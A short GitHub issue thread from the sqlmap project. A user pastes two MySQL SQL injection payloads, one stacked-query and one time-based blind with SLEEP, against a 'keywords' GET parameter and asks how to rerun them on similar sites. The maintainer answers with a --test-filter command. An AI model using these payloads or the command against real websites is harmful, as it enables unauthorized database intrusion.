### ISSUE TITLE
How to custom payload on sqlmap?

### ISSUE THREAD

**Issue by chvdedo** [sqlmapproject/sqlmap#5239]
i found someone give a payload like 
**---
Parameter: keywords (GET)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: payload=a1266f4d54772e420f6661cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=pay&load=tfxgst7flvw5snn6r1b24fnyu8neev6w6664v6u1uik7''')));SELECT
SLEEP(5)#
    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
    Payload: payload=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b33350df06861&search=pay&load=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1666uik7''')))
RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
---**

so how to run this payload on sqlmap?this payload can injection other same target website

**Comment by stamparm** [comment]
`--test-filter="MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)" -p keywords`

**Comment by chvdedo** [comment]
thanks sir
